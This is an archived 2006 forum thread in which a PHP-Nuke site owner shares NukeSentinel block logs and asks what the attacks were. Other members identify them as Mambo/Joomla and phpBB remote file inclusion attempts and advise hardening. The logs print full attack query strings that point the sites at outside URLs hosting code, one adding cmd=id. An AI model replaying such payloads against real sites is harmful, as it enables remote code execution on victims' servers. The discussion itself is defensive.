| Author |
Message |
death_dream
Hangin' Around
Joined: Aug 10, 2006
Posts: 38
|
 Posted:
Mon Aug 14, 2006 3:07 am |
|
Its been two days now since I installed Nuke Sentinel on my site and its already cought one guy. 
This is what the email said:
Code:Date & Time: 2006-08-13 22:59:25 NDT GMT -0230
Blocked IP: 85.98.82.217
User ID: Guest (1)
Reason: Abuse-Filter
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)
Query String: ddream.hostingposts.com/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.turx.nl/components/com_extcalendar/upload/Thehacker?&cmd=id
Get String: ddream.hostingposts.com/index.php?_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://www.turx.nl/components/com_extcalendar/upload/Thehacker?&cmd=id
Post String: ddream.hostingposts.com/index.php
Forwarded For: none
Client IP: none
Remote Address: 85.98.82.217
Remote Port: 12876
Request Method: GET
|
What was he trying to do?
~Death Dream~ |
| |
|
 
|
|
montego
Site Admin
Joined: Aug 29, 2004
Posts: 9457
Location: Arizona
|
| Posted:
Mon Aug 14, 2006 7:09 am |
|
Don't know for certain as I am not going to try and access his URI he/she tried to use. Doesn't matter right? NS got 'em!!!  |
_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! |
|
|
|
|
evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
|
| Posted:
Mon Aug 14, 2006 9:22 am |
|
It seems to be an attack against Mambo or Joomla systems. Probably a hacking robot script. |
_________________
- Only registered users can see links on this board! Get registered or login! -
Need help? Only registered users can see links on this board! Get registered or login! |
|
|
|
|
death_dream
|
| Posted:
Mon Aug 14, 2006 9:49 am |
|
| montego wrote: | | Don't know for certain as I am not going to try and access his URI he/she tried to use. Doesn't matter right? NS got 'em!!! |
even if you tried to the url you would get banned right?
~Death Dream~ |
| |
|
|
|
|
montego
|
| Posted:
Mon Aug 14, 2006 7:25 pm |
|
I don't mean trying out the URL on my own site...  What I meant was to try and download what this joker is trying to do in the embedded URI. |
| |
|
|
|
|
death_dream
|
| Posted:
Tue Aug 15, 2006 2:32 am |
|
|
|
|
|
death_dream
|
| Posted:
Tue Aug 15, 2006 6:44 am |
|
Got 2!
Code:Date & Time: 2006-08-15 08:20:40 NDT GMT -0230
Blocked IP: 86.107.102.26
User ID: Guest (1)
Reason: Abuse-Filter
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Query String: ddream.hostingposts.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://geocities.com/nsa_fby/0.txt?
Get String: ddream.hostingposts.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://geocities.com/nsa_fby/0.txt?
Post String: ddream.hostingposts.com/modules/Forums/admin/admin_styles.php
Forwarded For: none
Client IP: none
Remote Address: 86.107.102.26
Remote Port: 2062
Request Method: GET
|
Any idea on this one? |
| |
|
|
|
|
gregexp
The Mouse Is Extension Of Arm
Joined: Feb 21, 2006
Posts: 1497
Location: In front of a screen....HELP! lol
|
| Posted:
Tue Aug 15, 2006 9:19 am |
|
phpbb root path exploit.
sentinel stops these and its doing its job. |
_________________
For those who stand shall NEVER fall and those who fall shall RISE once more!! |
|
  
  |
|
death_dream
|
| Posted:
Tue Aug 15, 2006 11:32 am |
|
Excellent. Should I update my phpbb then as well? I'm using 2.0.18
~Death Dream~ |
| |
|
|
|
|
kguske
Site Admin
Joined: Jun 04, 2004
Posts: 6437
|
| Posted:
Tue Aug 15, 2006 3:42 pm |
|
First, put admin authentication on the modules/Forums/admin directory. 2.0.19 is good, but there is some debate about 2.0.20. |
_________________
I search, therefore I exist...
Only registered users can see links on this board! Get registered or login! |
|
|
|
|
death_dream
|
| Posted:
Wed Aug 16, 2006 2:54 am |
|
K I will put admin authentication on. But could you tell me how it works before I find my self to the point that I can't log in lol.
Also I put block proxies on strong level, So what does "Default Page" mean?
~Death Dream~ |
| |
|
|
|
|
montego
|
| Posted:
Wed Aug 16, 2006 6:51 am |
|
| Quote: |
Also I put block proxies on strong level, So what does "Default Page" mean?
|
It simply means that when the attack is caught, it will display the default blocker page that came with NS... NS allows you to create your own if you would rather not use what is provided. However, I kind of like the "in your face" page that is provided...  |
| |
|
|
|
|
death_dream
|
| Posted:
Wed Aug 16, 2006 7:59 am |
|
I installed PC killer on it.
~Death Dream~ |
| |
|
|
|
|
montego
|
| Posted:
Thu Aug 17, 2006 5:31 am |
|
Well, that is far more "in your face" than the default blocker pages.  |
| |
|
|
|
|
death_dream
|
| Posted:
Thu Aug 17, 2006 6:04 am |
|
| montego wrote: | | Well, that is far more "in your face" than the default blocker pages. |
Thats what I want
~Death Dream~ |
| |
|
|
|
|
utssace
Worker
Joined: Feb 18, 2006
Posts: 155
Location: Virginia
|
| Posted:
Tue Aug 22, 2006 5:16 pm |
|
How do you turn on admin authentication for the forum. I have it turned on for admin access to the site (config.php). |
| |
|
|
|
|
montego
|
| Posted:
Wed Aug 23, 2006 7:05 am |
|
|
|
|
|
|
|
![[Valid RSS]](https://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
